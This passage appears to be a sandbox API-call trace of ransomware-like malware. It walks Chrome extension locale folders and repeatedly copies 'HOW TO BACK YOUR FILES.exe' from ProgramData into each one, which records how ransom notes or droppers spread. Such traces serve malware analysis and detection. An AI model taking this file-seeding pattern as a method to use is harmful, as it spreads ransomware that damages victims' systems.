lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x833dcb50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d41f700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d41f700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.209] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata" [0111.209] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata" [0111.209] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.209] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.210] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.210] GetLastError () returned 0x0 [0111.211] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.211] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x836ddc00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d41f700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d41f700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.211] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales" [0111.211] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales" [0111.211] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.211] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.212] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.212] GetLastError () returned 0x0 [0111.212] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.212] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x833e6790, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4df34160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4df34160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.213] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW" [0111.213] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW" [0111.213] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.213] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.214] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.214] GetLastError () returned 0x0 [0111.214] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.214] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83624340, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d445860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d445860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.215] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh" [0111.215] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh" [0111.215] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.215] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.216] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.216] GetLastError () returned 0x0 [0111.216] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.216] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8361ce10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d445860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d445860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.216] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi" [0111.217] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi" [0111.217] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.217] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.217] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.218] GetLastError () returned 0x0 [0111.218] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.218] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x836158e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d46b9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d46b9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.218] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk" [0111.218] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk" [0111.218] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.218] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.219] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.219] GetLastError () returned 0x0 [0111.220] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.220] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8360bca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d491b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d491b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.220] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr" [0111.220] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr" [0111.220] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.220] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.221] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.221] GetLastError () returned 0x0 [0111.221] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.221] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835fd240, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d4b7c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d4b7c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.222] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th" [0111.222] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th" [0111.223] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.223] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.224] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.224] GetLastError () returned 0x0 [0111.224] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.224] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\*", 